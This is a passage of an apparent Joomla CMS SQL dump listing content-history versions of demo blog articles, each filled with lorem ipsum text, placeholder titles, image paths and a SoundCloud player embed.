00:00:00\",\"images\":\"{\\\"image_intro\\\":\\\"\\\",\\\"float_intro\\\":\\\"\\\",\\\"image_intro_alt\\\":\\\"\\\",\\\"image_intro_caption\\\":\\\"\\\",\\\"image_fulltext\\\":\\\"\\\",\\\"float_fulltext\\\":\\\"\\\",\\\"image_fulltext_alt\\\":\\\"\\\",\\\"image_fulltext_caption\\\":\\\"\\\"}\",\"urls\":\"{\\\"urla\\\":false,\\\"urlatext\\\":\\\"\\\",\\\"targeta\\\":\\\"\\\",\\\"urlb\\\":false,\\\"urlbtext\\\":\\\"\\\",\\\"targetb\\\":\\\"\\\",\\\"urlc\\\":false,\\\"urlctext\\\":\\\"\\\",\\\"targetc\\\":\\\"\\\"}\",\"attribs\":\"{\\\"show_title\\\":\\\"\\\",\\\"link_titles\\\":\\\"\\\",\\\"show_tags\\\":\\\"\\\",\\\"show_intro\\\":\\\"\\\",\\\"info_block_position\\\":\\\"\\\",\\\"show_category\\\":\\\"\\\",\\\"link_category\\\":\\\"\\\",\\\"show_parent_category\\\":\\\"\\\",\\\"link_parent_category\\\":\\\"\\\",\\\"show_author\\\":\\\"\\\",\\\"link_author\\\":\\\"\\\",\\\"show_create_date\\\":\\\"\\\",\\\"show_modify_date\\\":\\\"\\\",\\\"show_publish_date\\\":\\\"\\\",\\\"show_item_navigation\\\":\\\"\\\",\\\"show_icons\\\":\\\"\\\",\\\"show_print_icon\\\":\\\"\\\",\\\"show_email_icon\\\":\\\"\\\",\\\"show_vote\\\":\\\"\\\",\\\"show_hits\\\":\\\"\\\",\\\"show_noauth\\\":\\\"\\\",\\\"urls_position\\\":\\\"\\\",\\\"alternative_readmore\\\":\\\"\\\",\\\"article_layout\\\":\\\"\\\",\\\"show_publishing_options\\\":\\\"\\\",\\\"show_article_options\\\":\\\"\\\",\\\"show_urls_images_backend\\\":\\\"\\\",\\\"show_urls_images_frontend\\\":\\\"\\\",\\\"post_format\\\":\\\"gallery\\\",\\\"gallery\\\":\\\"{\\\\\\\"gallery_images\\\\\\\":[\\\\\\\"images\\\\\\/blog\\\\\\/blog06.jpg\\\\\\\",\\\\\\\"images\\\\\\/blog\\\\\\/blog05.jpg\\\\\\\",\\\\\\\"images\\\\\\/blog\\\\\\/blog04.jpg\\\\\\\"]}\\\",\\\"audio\\\":\\\"\\\",\\\"video\\\":\\\"\\\",\\\"link_title\\\":\\\"\\\",\\\"link_url\\\":\\\"\\\",\\\"quote_text\\\":\\\"\\\",\\\"quote_author\\\":\\\"\\\",\\\"post_status\\\":\\\"\\\"}\",\"version\":3,\"ordering\":\"0\",\"metakey\":\"\",\"metadesc\":\"\",\"access\":\"1\",\"hits\":\"0\",\"metadata\":\"{\\\"robots\\\":\\\"\\\",\\\"author\\\":\\\"\\\",\\\"rights\\\":\\\"\\\",\\\"xreference\\\":\\\"\\\"}\",\"featured\":\"0\",\"language\":\"*\",\"xreference\":\"\"}',0),(23,75,1,'','2015-02-02 20:53:52',692,2986,'b733c0264029616c869839b0d11fa141f0a586ea','{\"id\":75,\"asset_id\":199,\"title\":\"Leberkas tail swine pork (2)\",\"alias\":\"leberkas-tail-swine-pork-2\",\"introtext\":\"<p>Pellentesque habitant morbi tristique senectus et netus et malesuada fames ac turpis egestas. Vestibulum tortor quam, feugiat vitae, ultricies eget, tempor sit amet, ante. Donec eu libero sit amet quam egestas semper. Aenean ultricies mi vitae est. Mauris placerat eleifend leo.<\\/p>\\r\\n\",\"fulltext\":\"\\r\\n<p>Pellentesque habitant morbi tristique senectus et netus et malesuada fames ac turpis egestas. Vestibulum tortor quam, feugiat vitae, ultricies eget, tempor sit amet, ante. Donec eu libero sit amet quam egestas semper. Aenean ultricies mi vitae est. Mauris placerat eleifend leo. Quisque sit amet est et sapien ullamcorper pharetra. Vestibulum erat wisi, condimentum sed, commodo vitae, ornare sit amet, wisi. Aenean fermentum, elit eget tincidunt condimentum, eros ipsum rutrum orci, sagittis tempus lacus enim ac dui. Donec non enim in turpis pulvinar facilisis. Ut felis. Praesent dapibus, neque id cursus faucibus, tortor neque egestas augue, eu vulputate magna eros eu erat. Aliquam erat volutpat. Nam dui mi, tincidunt quis, accumsan porttitor, facilisis luctus, metus<\\/p>\",\"state\":0,\"catid\":\"79\",\"created\":\"2015-02-02 20:29:50\",\"created_by\":\"864\",\"created_by_alias\":\"\",\"modified\":\"2015-02-02 20:41:44\",\"modified_by\":null,\"checked_out\":null,\"checked_out_time\":null,\"publish_up\":\"2015-02-02 20:29:50\",\"publish_down\":\"\",\"images\":\"{\\\"image_intro\\\":\\\"images\\\\\\/blog\\\\\\/blog01.jpg\\\",\\\"float_intro\\\":\\\"\\\",\\\"image_intro_alt\\\":\\\"\\\",\\\"image_intro_caption\\\":\\\"\\\",\\\"image_fulltext\\\":\\\"images\\\\\\/blog\\\\\\/blog01.jpg\\\",\\\"float_fulltext\\\":\\\"\\\",\\\"image_fulltext_alt\\\":\\\"\\\",\\\"image_fulltext_caption\\\":\\\"\\\"}\",\"urls\":\"{\\\"urla\\\":false,\\\"urlatext\\\":\\\"\\\",\\\"targeta\\\":\\\"\\\",\\\"urlb\\\":false,\\\"urlbtext\\\":\\\"\\\",\\\"targetb\\\":\\\"\\\",\\\"urlc\\\":false,\\\"urlctext\\\":\\\"\\\",\\\"targetc\\\":\\\"\\\"}\",\"attribs\":\"{\\\"show_title\\\":\\\"\\\",\\\"link_titles\\\":\\\"\\\",\\\"show_tags\\\":\\\"\\\",\\\"show_intro\\\":\\\"\\\",\\\"info_block_position\\\":\\\"\\\",\\\"show_category\\\":\\\"\\\",\\\"link_category\\\":\\\"\\\",\\\"show_parent_category\\\":\\\"\\\",\\\"link_parent_category\\\":\\\"\\\",\\\"show_author\\\":\\\"\\\",\\\"link_author\\\":\\\"\\\",\\\"show_create_date\\\":\\\"\\\",\\\"show_modify_date\\\":\\\"\\\",\\\"show_publish_date\\\":\\\"\\\",\\\"show_item_navigation\\\":\\\"\\\",\\\"show_icons\\\":\\\"\\\",\\\"show_print_icon\\\":\\\"\\\",\\\"show_email_icon\\\":\\\"\\\",\\\"show_vote\\\":\\\"\\\",\\\"show_hits\\\":\\\"\\\",\\\"show_noauth\\\":\\\"\\\",\\\"urls_position\\\":\\\"\\\",\\\"alternative_readmore\\\":\\\"\\\",\\\"article_layout\\\":\\\"\\\",\\\"show_publishing_options\\\":\\\"\\\",\\\"show_article_options\\\":\\\"\\\",\\\"show_urls_images_backend\\\":\\\"\\\",\\\"show_urls_images_frontend\\\":\\\"\\\",\\\"post_format\\\":\\\"standard\\\",\\\"gallery\\\":\\\"\\\",\\\"audio\\\":\\\"\\\",\\\"video\\\":\\\"\\\",\\\"link_title\\\":\\\"\\\",\\\"link_url\\\":\\\"\\\",\\\"quote_text\\\":\\\"\\\",\\\"quote_author\\\":\\\"\\\",\\\"post_status\\\":\\\"\\\"}\",\"version\":1,\"ordering\":null,\"metakey\":\"\",\"metadesc\":\"\",\"access\":\"1\",\"hits\":null,\"metadata\":\"{\\\"robots\\\":\\\"\\\",\\\"author\\\":\\\"\\\",\\\"rights\\\":\\\"\\\",\\\"xreference\\\":\\\"\\\"}\",\"featured\":\"0\",\"language\":\"*\",\"xreference\":\"\"}',0),(24,75,1,'','2015-02-02 20:55:25',692,3290,'5f3e633cad869e47c3feccb1cd2bec12a5e38550','{\"id\":75,\"asset_id\":\"199\",\"title\":\"Leberkas tail swine pork (2)\",\"alias\":\"leberkas-tail-swine-pork-2\",\"introtext\":\"<p>Pellentesque habitant morbi tristique senectus et netus et malesuada fames ac turpis egestas. Vestibulum tortor quam, feugiat vitae, ultricies eget, tempor sit amet, ante. Donec eu libero sit amet quam egestas semper. Aenean ultricies mi vitae est. Mauris placerat eleifend leo.<\\/p>\\r\\n\",\"fulltext\":\"\\r\\n<p>Pellentesque habitant morbi tristique senectus et netus et malesuada fames ac turpis egestas. Vestibulum tortor quam, feugiat vitae, ultricies eget, tempor sit amet, ante. Donec eu libero sit amet quam egestas semper. Aenean ultricies mi vitae est. Mauris placerat eleifend leo. Quisque sit amet est et sapien ullamcorper pharetra. Vestibulum erat wisi, condimentum sed, commodo vitae, ornare sit amet, wisi. Aenean fermentum, elit eget tincidunt condimentum, eros ipsum rutrum orci, sagittis tempus lacus enim ac dui. Donec non enim in turpis pulvinar facilisis. Ut felis. Praesent dapibus, neque id cursus faucibus, tortor neque egestas augue, eu vulputate magna eros eu erat. Aliquam erat volutpat. Nam dui mi, tincidunt quis, accumsan porttitor, facilisis luctus, metus<\\/p>\",\"state\":0,\"catid\":\"79\",\"created\":\"2015-02-02 20:29:50\",\"created_by\":\"864\",\"created_by_alias\":\"\",\"modified\":\"2015-02-02 20:55:25\",\"modified_by\":\"864\",\"checked_out\":\"864\",\"checked_out_time\":\"2015-02-02 20:53:52\",\"publish_up\":\"2015-02-02 20:29:50\",\"publish_down\":\"\",\"images\":\"{\\\"image_intro\\\":\\\"\\\",\\\"float_intro\\\":\\\"\\\",\\\"image_intro_alt\\\":\\\"\\\",\\\"image_intro_caption\\\":\\\"\\\",\\\"image_fulltext\\\":\\\"\\\",\\\"float_fulltext\\\":\\\"\\\",\\\"image_fulltext_alt\\\":\\\"\\\",\\\"image_fulltext_caption\\\":\\\"\\\"}\",\"urls\":\"{\\\"urla\\\":false,\\\"urlatext\\\":\\\"\\\",\\\"targeta\\\":\\\"\\\",\\\"urlb\\\":false,\\\"urlbtext\\\":\\\"\\\",\\\"targetb\\\":\\\"\\\",\\\"urlc\\\":false,\\\"urlctext\\\":\\\"\\\",\\\"targetc\\\":\\\"\\\"}\",\"attribs\":\"{\\\"show_title\\\":\\\"\\\",\\\"link_titles\\\":\\\"\\\",\\\"show_tags\\\":\\\"\\\",\\\"show_intro\\\":\\\"\\\",\\\"info_block_position\\\":\\\"\\\",\\\"show_category\\\":\\\"\\\",\\\"link_category\\\":\\\"\\\",\\\"show_parent_category\\\":\\\"\\\",\\\"link_parent_category\\\":\\\"\\\",\\\"show_author\\\":\\\"\\\",\\\"link_author\\\":\\\"\\\",\\\"show_create_date\\\":\\\"\\\",\\\"show_modify_date\\\":\\\"\\\",\\\"show_publish_date\\\":\\\"\\\",\\\"show_item_navigation\\\":\\\"\\\",\\\"show_icons\\\":\\\"\\\",\\\"show_print_icon\\\":\\\"\\\",\\\"show_email_icon\\\":\\\"\\\",\\\"show_vote\\\":\\\"\\\",\\\"show_hits\\\":\\\"\\\",\\\"show_noauth\\\":\\\"\\\",\\\"urls_position\\\":\\\"\\\",\\\"alternative_readmore\\\":\\\"\\\",\\\"article_layout\\\":\\\"\\\",\\\"show_publishing_options\\\":\\\"\\\",\\\"show_article_options\\\":\\\"\\\",\\\"show_urls_images_backend\\\":\\\"\\\",\\\"show_urls_images_frontend\\\":\\\"\\\",\\\"post_format\\\":\\\"audio\\\",\\\"gallery\\\":\\\"\\\",\\\"audio\\\":\\\"<iframe width=\\\\\\\"100%\\\\\\\" height=\\\\\\\"450\\\\\\\" scrolling=\\\\\\\"no\\\\\\\" frameborder=\\\\\\\"no\\\\\\\" src=\\\\\\\"https:\\\\\\/\\\\\\/w.soundcloud.com\\\\\\/player\\\\\\/?url=https%3A\\\\\\/\\\\\\/api.soundcloud.com\\\\\\/tracks\\\\\\/28830162&auto_play=false&hide_related=false&show_comments=true&show_user=true&show_reposts=false&visual=true\\\\\\\"><\\\\\\/iframe>\\\",\\\"video\\\":\\\"\\\",\\\"link_title\\\":\\\"\\\",\\\"link_url\\\":\\\"\\\",\\\"quote_text\\\":\\\"\\\",\\\"quote_author\\\":\\\"\\\",\\\"post_status\\\":\\\"\\\"}\",\"version\":2,\"ordering\":\"0\",\"metakey\":\"\",\"metadesc\":\"\",\"access\":\"1\",\"hits\":\"0\",\"metadata\":\"{\\\"robots\\\":\\\"\\\",\\\"author\\\":\\\"\\\",\\\"rights\\\":\\\"\\\",\\\"xreference\\\":\\\"\\\"}\",\"featured\":\"0\",\"language\":\"*\",\"xreference\":\"\"}',0),(25,75,1,'','2015-02-02 20:55:33',692,3309,'4042e0f7cdaab4924473214ec8cb1e224fca233e','{\"id\":75,\"asset_id\":\"199\",\"title\":\"Leberkas tail swine pork (2)\",\"alias\":\"leberkas-tail-swine-pork-2\",\"introtext\":\"<p>Pellentesque habitant morbi tristique senectus et netus et malesuada fames ac turpis egestas. Vestibulum tortor quam, feugiat vitae, ultricies eget, tempor sit amet, ante. Donec eu libero sit amet quam egestas semper. Aenean ultricies mi vitae est. Mauris placerat eleifend leo.<\\/p>\\r\\n\",\"fulltext\":\"\\r\\n<p>Pellentesque habitant morbi tristique senectus et netus et malesuada fames ac turpis egestas. Vestibulum tortor quam, feugiat vitae, ultricies eget, tempor sit amet, ante. Donec eu libero sit amet quam egestas semper. Aenean ultricies mi vitae est. Mauris placerat eleifend leo. Quisque sit amet est et sapien ullamcorper pharetra. Vestibulum erat wisi, condimentum sed, commodo vitae, ornare sit amet, wisi. Aenean fermentum, elit eget tincidunt condimentum, eros ipsum rutrum orci, sagittis tempus lacus enim ac dui. Donec non enim in turpis pulvinar facilisis. Ut felis. Praesent dapibus, neque id cursus faucibus, tortor neque egestas augue, eu vulputate magna eros eu erat. Aliquam erat volutpat. Nam dui mi, tincidunt quis, accumsan porttitor, facilisis luctus, metus<\\/p>\",\"state\":1,\"catid\":\"79\",\"created\":\"2015-02-02 20:29:50\",\"created_by\":\"864\",\"created_by_alias\":\"\",\"modified\":\"2015-02-02 20:55:33\",\"modified_by\":\"864\",\"checked_out\":\"864\",\"checked_out_time\":\"2015-02-02 20:55:25\",\"publish_up\":\"2015-02-02 20:29:50\",\"publish_down\":\"0000-00-00 00:00:00\",\"images\":\"{\\\"image_intro\\\":\\\"\\\",\\\"float_intro\\\":\\\"\\\",\\\"image_intro_alt\\\":\\\"\\\",\\\"image_intro_caption\\\":\\\"\\\",\\\"image_fulltext\\\":\\\"\\\",\\\"float_fulltext\\\":\\\"\\\",\\\"image_fulltext_alt\\\":\\\"\\\",\\\"image_fulltext_caption\\\":\\\"\\\"}\",\"urls\":\"{\\\"urla\\\":false,\\\"urlatext\\\":\\\"\\\",\\\"targeta\\\":\\\"\\\",\\\"urlb\\\":false,\\\"urlbtext\\\":\\\"\\\",\\\"targetb\\\":\\\"\\\",\\\"urlc\\\":false,\\\"urlctext\\\":\\\"\\\",\\\"targetc\\\":\\\"\\\"}\",\"attribs\":\"{\\\"show_title\\\":\\\"\\\",\\\"link_titles\\\":\\\"\\\",\\\"show_tags\\\":\\\"\\\",\\\"show_intro\\\":\\\"\\\",\\\"info_block_position\\\":\\\"\\\",\\\"show_category\\\":\\\"\\\",\\\"link_category\\\":\\\"\\\",\\\"show_parent_category\\\":\\\"\\\",\\\"link_parent_category\\\":\\\"\\\",\\\"show_author\\\":\\\"\\\",\\\"link_author\\\":\\\"\\\",\\\"show_create_date\\\":\\\"\\\",\\\"show_modify_date\\\":\\\"\\\",\\\"show_publish_date\\\":\\\"\\\",\\\"show_item_navigation\\\":\\\"\\\",\\\"show_icons\\\":\\\"\\\",\\\"show_print_icon\\\":\\\"\\\",\\\"show_email_icon\\\":\\\"\\\",\\\"show_vote\\\":\\\"\\\",\\\"show_hits\\\":\\\"\\\",\\\"show_noauth\\\":\\\"\\\",\\\"urls_position\\\":\\\"\\\",\\\"alternative_readmore\\\":\\\"\\\",\\\"article_layout\\\":\\\"\\\",\\\"show_publishing_options\\\":\\\"\\\",\\\"show_article_options\\\":\\\"\\\",\\\"show_urls_images_backend\\\":\\\"\\\",\\\"show_urls_images_frontend\\\":\\\"\\\",\\\"post_format\\\":\\\"audio\\\",\\\"gallery\\\":\\\"\\\",\\\"audio\\\":\\\"<iframe width=\\\\\\\"100%\\\\\\\" height=\\\\\\\"450\\\\\\\" scrolling=\\\\\\\"no\\\\\\\" frameborder=\\\\\\\"no\\\\\\\" src=\\\\\\\"https:\\\\\\/\\\\\\/w.soundcloud.com\\\\\\/player\\\\\\/?url=https%3A\\\\\\/\\\\\\/api.soundcloud.com\\\\\\/tracks\\\\\\/28830162&auto_play=false&hide_related=false&show_comments=true&show_user=true&show_reposts=false&visual=true\\\\\\\"><\\\\\\/iframe>\\\",\\\"video\\\":\\\"\\\",\\\"link_title\\\":\\\"\\\",\\\"link_url\\\":\\\"\\\",\\\"quote_text\\\":\\\"\\\",\\\"quote_author\\\":\\\"\\\",\\\"post_status\\\":\\\"\\\"}\",\"version\":3,\"ordering\":\"0\",\"metakey\":\"\",\"metadesc\":\"\",\"access\":\"1\",\"hits\":\"0\",\"metadata\":\"{\\\"robots\\\":\\\"\\\",\\\"author\\\":\\\"\\\",\\\"rights\\\":\\\"\\\",\\\"xreference\\\":\\\"\\\"}\",\"featured\":\"0\",\"language\":\"*\",\"xreference\":\"\"}',0),(26,75,1,'','2015-02-02 20:58:11',692,3325,'214eb92eda7e3fd1aa2e9358f79cd9f35c145ed1','{\"id\":75,\"asset_id\":\"199\",\"title\":\"5 Effective Email Unsubscribe Pages\",\"alias\":\"5-effective-email-unsubscribe-pages\",\"introtext\":\"<p>Pellentesque habitant morbi tristique senectus et netus et malesuada fames ac turpis egestas. Vestibulum tortor quam, feugiat vitae, ultricies eget, tempor sit amet, ante. Donec eu libero sit amet quam egestas semper. Aenean ultricies mi vitae est. Mauris placerat eleifend leo.<\\/p>\\r\\n\",\"fulltext\":\"\\r\\n<p>Pellentesque habitant morbi tristique senectus et netus et malesuada fames ac turpis egestas. Vestibulum tortor quam, feugiat vitae, ultricies eget, tempor sit amet, ante. Donec eu libero sit amet quam egestas semper. Aenean ultricies mi vitae est. Mauris placerat eleifend leo. Quisque sit amet est et sapien ullamcorper pharetra. Vestibulum erat wisi, condimentum sed, commodo vitae, ornare sit amet, wisi. Aenean fermentum, elit eget tincidunt condimentum, eros ipsum rutrum orci, sagittis tempus lacus enim ac dui. Donec non enim in turpis pulvinar facilisis. Ut felis. Praesent dapibus, neque id cursus faucibus, tortor neque egestas augue, eu vulputate magna eros eu erat. Aliquam erat volutpat. Nam dui mi, tincidunt quis, accumsan porttitor, facilisis luctus, metus<\\/p>\",\"state\":1,\"catid\":\"79\",\"created\":\"2015-02-02 20:29:50\",\"created_by\":\"864\",\"created_by_alias\":\"\",\"modified\":\"2015-02-02 20:58:11\",\"modified_by\":\"864\",\"checked_out\":\"864\",\"checked_out_time\":\"2015-02-02 20:55:33\",\"publish_up\":\"2015-02-02 20:29:50\",\"publish_down\":\"0000-00-00 00:00:00\",\"images\":\"{\\\"image_intro\\\":\\\"\\\",\\\"float_intro\\\":\\\"\\\",\\\"image_intro_alt\\\":\\\"\\\",\\\"image_intro_caption\\\":\\\"\\\",\\\"image_fulltext\\\":\\\"\\\",\\\"float_fulltext\\\":\\\"\\\",\\\"image_fulltext_alt\\\":\\\"\\\",\\\"image_fulltext_caption\\\":\\\"\\\"}\",\"urls\":\"{\\\"urla\\\":false,\\\"urlatext\\\":\\\"\\\",\\\"targeta\\\":\\\"\\\",\\\"urlb\\\":false,\\\"urlbtext\\\":\\\"\\\",\\\"targetb\\\":\\\"\\\",\\\"urlc\\\":false,\\\"urlctext\\\":\\\"\\\",\\\"targetc\\\":\\\"\\\"}\",\"attribs\":\"{\\\"show_title\\\":\\\"\\\",\\\"link_titles\\\":\\\"\\\",\\\"show_tags\\\":\\\"\\\",\\\"show_intro\\\":\\\"\\\",\\\"info_block_position\\\":\\\"\\\",\\\"show_category\\\":\\\"\\\",\\\"link_category\\\":\\\"\\\",\\\"show_parent_category\\\":\\\"\\\",\\\"link_parent_category\\\":\\\"\\\",\\\"show_author\\\":\\\"\\\",\\\"link_author\\\":\\\"\\\",\\\"show_create_date\\\":\\\"\\\",\\\"show_modify_date\\\":\\\"\\\",\\\"show_publish_date\\\":\\\"\\\",\\\"show_item_navigation\\\":\\\"\\\",\\\"show_icons\\\":\\\"\\\",\\\"show_print_icon\\\":\\\"\\\",\\\"show_email_icon\\\":\\\"\\\",\\\"show_vote\\\":\\\"\\\",\\\"show_hits\\\":\\\"\\\",\\\"show_noauth\\\":\\\"\\\",\\\"urls_position\\\":\\\"\\\",\\\"alternative_readmore\\\":\\\"\\\",\\\"article_layout\\\":\\\"\\\",\\\"show_publishing_options\\\":\\\"\\\",\\\"show_article_options\\\":\\\"\\\",\\\"show_urls_images_backend\\\":\\\"\\\",\\\"show_urls_images_frontend\\\":\\\"\\\",\\\"post_format\\\":\\\"audio\\\",\\\"gallery\\\":\\\"\\\",\\\"audio\\\":\\\"<iframe width=\\\\\\\"100%\\\\\\\" height=\\\\\\\"450\\\\\\\" scrolling=\\\\\\\"no\\\\\\\" frameborder=\\\\\\\"no\\\\\\\" src=\\\\\\\"https:\\\\\\/\\\\\\/w.soundcloud.com\\\\\\/player\\\\\\/?url=https%3A\\\\\\/\\\\\\/api.soundcloud.com\\\\\\/tracks\\\\\\/28830162&auto_play=false&hide_related=false&show_comments=true&show_user=true&show_reposts=false&visual=true\\\\\\\"><\\\\\\/iframe>\\\",\\\"video\\\":\\\"\\\",\\\"link_title\\\":\\\"\\\",\\\"link_url\\\":\\\"\\\",\\\"quote_text\\\":\\\"\\\",\\\"quote_author\\\":\\\"\\\",\\\"post_status\\\":\\\"\\\"}\",\"version\":4,\"ordering\":\"0\",\"metakey\":\"\",\"metadesc\":\"\",\"access\":\"1\",\"hits\":\"0\",\"metadata\":\"{\\\"robots\\\":\\\"\\\",\\\"author\\\":\\\"\\\",\\\"rights\\\":\\\"\\\",\\\"xreference\\\":\\\"\\\"}\",\"featured\":\"0\",\"language\":\"*\",\"xreference\":\"\"}',0),(27,76,1,'','2015-02-02 20:59:21',692,3284,'4ae92dd3439354d44eaa990f051fe33a25a09410','{\"id\":76,\"asset_id\":200,\"title\":\"Who Actually Clicks on Banner Ads?\",\"alias\":\"who-actually-clicks-on-banner-ads\",\"introtext\":\"<p>Pellentesque habitant morbi tristique senectus et netus et malesuada fames ac turpis egestas. Vestibulum tortor quam, feugiat vitae, ultricies eget, tempor sit amet, ante. Donec eu libero sit amet quam egestas semper. Aenean ultricies mi vitae est. Mauris placerat eleifend leo.<\\/p>\\r\\n\",\"fulltext\":\"\\r\\n<p>Pellentesque habitant morbi tristique senectus et netus et malesuada fames ac turpis egestas. Vestibulum tortor quam, feugiat vitae, ultricies eget, tempor sit amet, ante. Donec eu libero sit amet quam egestas semper. Aenean ultricies mi vitae est. Mauris placerat eleifend leo. Quisque sit amet est et sapien ullamcorper pharetra. Vestibulum erat wisi, condimentum sed, commodo vitae, ornare sit amet, wisi. Aenean fermentum, elit eget tincidunt condimentum, eros ipsum rutrum orci, sagittis tempus lacus enim ac dui. Donec non enim in turpis pulvinar facilisis. Ut felis. Praesent dapibus, neque id cursus faucibus, tortor neque egestas augue, eu vulputate magna eros eu erat. Aliquam erat volutpat. Nam dui mi, tincidunt quis, accumsan porttitor, facilisis luctus, metus<\\/p>\",\"state\":0,\"catid\":\"79\",\"created\":\"2015-02-02 20:29:50\",\"created_by\":\"864\",\"created_by_alias\":\"\",\"modified\":\"2015-02-02 20:58:11\",\"modified_by\":null,\"checked_out\":null,\"checked_out_time\":null,\"publish_up\":\"2015-02-02 20:29:50\",\"publish_down\":\"\",\"images\":\"{\\\"image_intro\\\":\\\"\\\",\\\"float_intro\\\":\\\"\\\",\\\"image_intro_alt\\\":\\\"\\\",\\\"image_intro_caption\\\":\\\"\\\",\\\"image_fulltext\\\":\\\"\\\",\\\"float_fulltext\\\":\\\"\\\",\\\"image_fulltext_alt\\\":\\\"\\\",\\\"image_fulltext_caption\\\":\\\"\\\"}\",\"urls\":\"{\\\"urla\\\":false,\\\"urlatext\\\":\\\"\\\",\\\"targeta\\\":\\\"\\\",\\\"urlb\\\":false,\\\"urlbtext\\\":\\\"\\\",\\\"targetb\\\":\\\"\\\",\\\"urlc\\\":false,\\\"urlctext\\\":\\\"\\\",\\\"targetc\\\":\\\"\\\"}\",\"attribs\":\"{\\\"show_title\\\":\\\"\\\",\\\"link_titles\\\":\\\"\\\",\\\"show_tags\\\":\\\"\\\",\\\"show_intro\\\":\\\"\\\",\\\"info_block_position\\\":\\\"\\\",\\\"show_category\\\":\\\"\\\",\\\"link_category\\\":\\\"\\\",\\\"show_parent_category\\\":\\\"\\\",\\\"link_parent_category\\\":\\\"\\\",\\\"show_author\\\":\\\"\\\",\\\"link_author\\\":\\\"\\\",\\\"show_create_date\\\":\\\"\\\",\\\"show_modify_date\\\":\\\"\\\",\\\"show_publish_date\\\":\\\"\\\",\\\"show_item_navigation\\\":\\\"\\\",\\\"show_icons\\\":\\\"\\\",\\\"show_print_icon\\\":\\\"\\\",\\\"show_email_icon\\\":\\\"\\\",\\\"show_vote\\\":\\\"\\\",\\\"show_hits\\\":\\\"\\\",\\\"show_noauth\\\":\\\"\\\",\\\"urls_position\\\":\\\"\\\",\\\"alternative_readmore\\\":\\\"\\\",\\\"article_layout\\\":\\\"\\\",\\\"show_publishing_options\\\":\\\"\\\",\\\"show_article_options\\\":\\\"\\\",\\\"show_urls_images_backend\\\":\\\"\\\",\\\"show_urls_images_frontend\\\":\\\"\\\",\\\"post_format\\\":\\\"audio\\\",\\\"gallery\\\":\\\"\\\",\\\"audio\\\":\\\"<iframe width=\\\\\\\"100%\\\\\\\" height=\\\\\\\"450\\\\\\\" scrolling=\\\\\\\"no\\\\\\\" frameborder=\\\\\\\"no\\\\\\\" src=\\\\\\\"https:\\\\\\/\\\\\\/w.soundcloud.com\\\\\\/player\\\\\\/?url=https%3A\\\\\\/\\\\\\/api.soundcloud.com\\\\\\/tracks\\\\\\/28830162&auto_play=false&hide_related=false&show_comments=true&show_user=true&show_reposts=false&visual=true\\\\\\\"><\\\\\\/iframe>\\\",\\\"video\\\":\\\"\\\",\\\"link_title\\\":\\\"\\\",\\\"link_url\\\":\\\"\\\",\\\"quote_text\\\":\\\"\\\",\\\"quote_author\\\":\\\"\\\",\\\"post_status\\\":\\\"\\\"}\",\"version\":1,\"ordering\":null,\"metakey\":\"\",\"metadesc\":\"\",\"access\":\"1\",\"hits\":null,\"metadata\":\"{\\\"robots\\\":\\\"\\\",\\\"author\\\":\\\"\\\",\\\"rights\\\":\\\"\\\",\\\"xreference\\\":\\\"\\\"}\",\"featured\":\"0\",\"language\":\"*\",\"xreference\":\"\"}',0),(28,76,1,'','2015-02-02 20:59:51',692,3036,'831346c8e036f9c50948e91fda6382464b93510f','{\"id\":76,\"asset_id\":\"200\",\"title\":\"Who Actually Clicks on Banner Ads?\",\"alias\":\"who-actually-clicks-on-banner-ads\",\"introtext\":\"<p>Pellentesque habitant morbi tristique senectus et netus et malesuada fames ac turpis egestas. Vestibulum tortor quam, feugiat vitae, ultricies eget, tempor sit amet, ante. Donec eu libero sit amet quam egestas semper. Aenean ultricies mi vitae est. Mauris placerat eleifend leo.<\\/p>\\r\\n\",\"fulltext\":\"\\r\\n<p>Pellentesque habitant morbi tristique senectus et netus et malesuada fames ac turpis egestas. Vestibulum tortor quam, feugiat vitae, ultricies eget, tempor sit amet, ante. Donec eu libero sit amet quam egestas semper. Aenean ultricies mi vitae est. Mauris placerat eleifend leo. Quisque sit amet est et sapien ullamcorper pharetra. Vestibulum erat wisi, condimentum sed, commodo vitae, ornare sit amet, wisi. Aenean fermentum, elit eget tincidunt condimentum, eros ipsum rutrum orci, sagittis tempus lacus enim ac dui. Donec non enim in turpis pulvinar facilisis. Ut felis. Praesent dapibus, neque id cursus faucibus, tortor neque egestas augue, eu vulputate magna eros eu erat. Aliquam erat volutpat. Nam dui mi, tincidunt quis, accumsan porttitor, facilisis luctus, metus<\\/p>\",\"state\":0,\"catid\":\"79\",\"created\":\"2015-02-02 20:29:50\",\"created_by\":\"864\",\"created_by_alias\":\"\",\"modified\":\"2015-02-02 20:59:51\",\"modified_by\":\"864\",\"checked_out\":\"864\",\"checked_out_time\":\"2015-02-02 20:59:21\",\"publish_up\":\"2015-02-02 20:29:50\",\"publish_down\":\"\",\"images\":\"{\\\"image_intro\\\":\\\"\\\",\\\"float_intro\\\":\\\"\\\",\\\"image_intro_alt\\\":\\\"\\\",\\\"image_intro_caption\\\":\\\"\\\",\\\"image_fulltext\\\":\\\"\\\",\\\"float_fulltext\\\":\\\"\\\",\\\"image_fulltext_alt\\\":\\\"\\\",\\\"image_fulltext_caption\\\":\\\"\\\"}\",\"urls\":\"{\\\"urla\\\":false,\\\"urlatext\\\":\\\"\\\",\\\"targeta\\\":\\\"\\\",\\\"urlb\\\":false,\\\"urlbtext\\\":\\\"\\\",\\\"targetb\\\":\\\"\\\",\\\"urlc\\\":false,\\\"urlctext\\\":\\\"\\\",\\\"targetc\\\":\\\"\\\"}\",\"attribs\":\"{\\\"show_title\\\":\\\"\\\",\\\"link_titles\\\":\\\"\\\",\\\"show_tags\\\":\\\"\\\",\\\"show_intro\\\":\\\"\\\",\\\"info_block_position\\\":\\\"\\\",\\\"show_category\\\":\\\"\\\",\\\"link_category\\\":\\\"\\\",\\\"show_parent_category\\\":\\\"\\\",\\\"link_parent_category\\\":\\\"\\\",\\\"show_author\\\":\\\"\\\",\\\"link_author\\\":\\\"\\\",\\\"show_create_date\\\":\\\"\\\",\\\"show_modify_date\\\":\\\"\\\",\\\"show_publish_date\\\":\\\"\\\",\\\"show_item_navigation\\\":\\\"\\\",\\\"show_icons\\\":\\\"\\\",\\\"show_print_icon\\\":\\\"\\\",\\\"show_email_icon\\\":\\\"\\\",\\\"show_vote\\\":\\\"\\\",\\\"show_hits\\\":\\\"\\\",\\\"show_noauth\\\":\\\"\\\",\\\"urls_position\\\":\\\"\\\",\\\"alternative_readmore\\\":\\\"\\\",\\\"article_layout\\\":\\\"\\\",\\\"show_publishing_options\\\":\\\"\\\",\\\"show_article_options\\\":\\\"\\\",\\\"show_urls_images_backend\\\":\\\"